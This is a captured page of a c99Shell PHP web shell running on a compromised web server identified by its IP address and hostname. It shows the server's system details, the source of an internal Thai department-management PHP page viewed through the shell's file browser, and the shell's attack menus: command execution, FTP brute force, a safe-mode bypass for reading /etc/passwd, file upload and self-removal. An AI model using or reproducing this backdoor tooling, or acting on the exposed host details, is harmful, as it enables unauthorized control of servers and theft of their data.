110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/eperson/admin/ drwxr-xr-x Free 52.33 GB of 127.8 GB (40.95%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/eperson/admin/ drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: deptstructure.php (6.33 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?
include_once "template.php";
include_once "../class/clsTable.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsdepttype.php";
include_once "../link/function.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EPERSON'], $GLOBALS['DBUSER_EPERSON'], $GLOBALS['DBPASS_EPERSON']);

$oDpT = new Department($oC);
$oDp = new Department($oC);
$oDP3 = new Department($oC);

$maxdate = $oDP3->MaxDate();
list($yy, $mm, $dd) = split("[-]", $maxdate);
$yy=($yy-543);
$maxdate2="$yy$mm$dd";

?>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
</head>
<body>
<table width="740" border="0" align="center" cellpadding="0" cellspacing="0">
	<tr>
		<td><br>
		  <fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="showdept.php">µСй§¤иТв¤Г§КГйТ§аѕЧиНЎТГКи§Л№С§КЧНг№ГРєєКТГєГГі</a> 
      <img src="../picture/ico3.gif" align="absmiddle" border="0">аѕФиБв¤Г§КГйТ§аѕЧиНЎТГКи§Л№С§КЧНг№ГРєєКТГєГГі</font></legend>
		<label><div align="center"><br>
		<form name=ff method=post action="processdept.php">
        <table width="70%" border="0" cellspacing="0" cellpadding="1" align="center" >
          <tr> 
            <td align="right"  height="22" valign="top" colspan="3"><font size="2" face="Microsoft Sans Serif"><strong>ВЧ№ВС№ЎТГгЄй§Т№в¤Г§КГйТ§єГФЛТГ№Хй</strong></font> 
            </td>
          </tr>
          <tr> 
            <td width="63%" align="right"><font size="2" face="Microsoft Sans Serif">аЕЧНЎЗС№·ХиВЧ№ВС№ЎТГгЄй§Т№ :: &nbsp;</font></td>
            <td width="22%" align="right"><script>DateInput('DocDate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script></td>
            <td width="15%" align="right"><input type="submit" name="set" value="ВЧ№ВС№бЕР»ГСєв¤Г§КГйТ§" onClick="return checkFormat('<? echo $maxdate2; ?>');"></td>
          </tr>
          <tr>
            <td colspan="3"><hr></td>
          </tr>
        </table>
		<input name="method" type="hidden" value="confirmdeptdate">
		</form>
		
        <br><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>аѕФиБв¤Г§КГйТ§аѕЧиНЎТГКи§Л№С§КЧНг№ГРєєКТГєГГі</b></font><br><br>
		<?
		include_once "../class/clsTable.php";
		$oT = new clsTable(array("КиЗ№ГТЄЎТГАТВг№","»ГРаА·ўН§<br>КиЗ№ГТЄЎТГАТВг№","ГТВЕРаНХВґ", "ґУа№Ф№ЎТГ"));
		$oT->bgColor="#CCCCCC";
		$oT->align="center";
		$oDpT->RSMainDepartment2($free,$free);		
		$rw=0;
		while ($oDpT->GetRecord()){
			ShowDeptM($oDpT->deptId);		
		}
		
		$oT->rowStart("","#ffffff");
		$oT->addCell("");
		$oT->addCell("");
		$oT->addCell("");
		$oT->addCell("<img src=\"../picture/new.gif\" alt=\"аѕФиБКиЗ№ГТЄЎТГАТВг№\" border=\"0\"  style=\"cursor:pointer;\" onclick=\"poppage();\">&nbsp;(аѕФиБГРґСє·Хи 1)", "center");
		$oT->rowEnd();
		
		echo "<form name=ps method=post>";
		echo "<input type=hidden name=method value=''>";
		echo "<input type=hidden name=startyear value=''>";
		echo $oT->output();
		echo "</form>";
	
		function ShowDeptM($deptId){
			global $oC;
			global $oT;
			global $Str;
			global $rw;
		
			$oDp  = new Department($oC);
			$oDpt= new Departmenttype($oC);
			
			$oDp->SearchByKey($deptId);
			$oDp->GetRecord();

			if ($oDp->deptLevel%2==0){							
				$bs="<b>";	
				$be="</b>";	
			}
			$oDpt->SearchByKey($oDp->depttypeId);
			$oDpt->GetRecord();
			$dt = $oDpt->depttypeName;
			$det = $oDp->deptDesc;
			$lv =  $oDp->deptLevel+1;
			$oT->addRow(array(str_repeat("<img src=../picture/blank.gif><img src=../picture/blank.gif><img src=../picture/blank.gif><img src=../picture/blank.gif><img src=../picture/blank.gif><img src=../picture/blank.gif>", $oDp->deptLevel*2). $bs ."   ".$oDp->deptName."  ". $be ,$dt,$det,	
					"	<img src=\"../picture/new.gif\" alt=\"аѕФиБКиЗ№ГТЄЎТГВиНВ\" border=\"0\" style=\"cursor:pointer;\" onclick=\"popup($lv,$oDp->deptId);\">
						 <a href=\"javascript:doEditMenu('$oDp->deptId')\"><img src=\"../picture/edit.gif\" alt=\"бЎйдў\"  border=\"0\" ></a>
						 <a href=\"javascript:doDelete(document.form1, '$oDp->deptName','$deptId')\">
							<img src=\"../picture/del.gif\" alt=\"Еє\"  border=\"0\"></a><input type=hidden name='deptId[]'  value=\"$oDp->deptId\" readonly>"));
			$oDp->RSmenuByDeptParent2deptdate0($deptId);
			while ($oDp->GetRecord()){
				ShowDeptM($oDp->deptId);
			}
		}
		?>
		<input type="button" name="back" value="ЎЕСєЛ№йТЛЕСЎ" onClick="location.href='showdept.php' ">
<br>
</div></label>
		</fieldset><br></td>
	</tr>
</table>
</body>
</html>
<script>
function checkFormat(p){
		var retval = true;  
		var ArrayStopDay = document.ff.DocDate.value.split("/");
		var StartDay = p;
		var StopDay = ArrayStopDay[2] + ArrayStopDay[1] + ArrayStopDay[0];
		
		if (StartDay >= StopDay) {
			alert("ЗС№·ХиВЧ№ВС№ЎТГгЄй§Т№·ХиаЕЧНЎ¤ЗГЁРБТЎЎЗиТЗС№·ХиВЧ№ВС№ЎТГгЄй§Т№г№в¤Г§КГйТ§аѕЧиНЎТГКи§Л№С§КЧНг№ГРєєКТГєГГіаґФБ");
			return false;
		}else{
			window.alert("ЛБТВаЛµШ :: аБЧиНЎґВЧ№ВС№ЎТГгЄйв¤Г§КГйТ§аѕЧиНЎТГКи§Л№С§КЧНг№ГРєєКТГєГГібЕйЗ\nЁРдБиКТБТГ¶а»ЕХиВ№б»Е§ўйНБЩЕв¤Г§КГйТ§ЎТГєГФЛТГ№ХйдґйНХЎ\nбЕРўйНБЩЕв¤Г§КГйТ§єГФЛТГ№Хй ЁР¶ЩЎ№Уд»гЄйа»з№в¤Г§КГйТ§»СЁЁШєС№\n ЎГШіТµГЗЁКНє¤ЗТБ¶ЩЎµйН§");
			var agree=confirm("¤ШіµйН§ЎТГВЧ№ВС№ЎТГгЄйв¤Г§КГйТ§аѕЧиНЎТГКи§Л№С§КЧНг№ГРєєКТГєГГігЄиЛГЧНдБи ?");
			if (agree){
				return true;
			}else{
				return false ;
			}
		}	
}
 function poppage(){ 	
window.open("deptpop1.php?deptLevel="+0+"&deptParent="+0,"",'toolbar=0, scrollbars=1, location=0, status=1, menubar=1, resizable=1, width=600, height=600, left = 500, top = 15');
 }
 function popup(deptLevel,deptParentId,startyear,endyear){ 	
window.open("deptpop1.php?startyear="+startyear+"&endyear="+endyear+"&deptLevel="+deptLevel+"&deptParentId="+deptParentId,"",'toolbar=0, scrollbars=1, location=0, status=1, menubar=1, resizable=1, width=600, height=600, left = 500, top = 15');
 }
function doEditMenu(deptId){
	window.open("deptpop2.php?deptId=" + deptId,"loaddorder",'toolbar=0, scrollbars=1, location=0, status=1, menubar=1, resizable=1, width=600, height=600, left = 500, top = 15');
}
function doDelete(f, txt,deptId){
	if (confirm('µйН§ЎТГЕєКиЗ№ГТЄЎТГ  ' + txt +  ' гЄиЛГЧНдБи') ) {
		window.location="processdept.php?method=delete&deptId=" + deptId;
	}
}
</script>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0049 ]--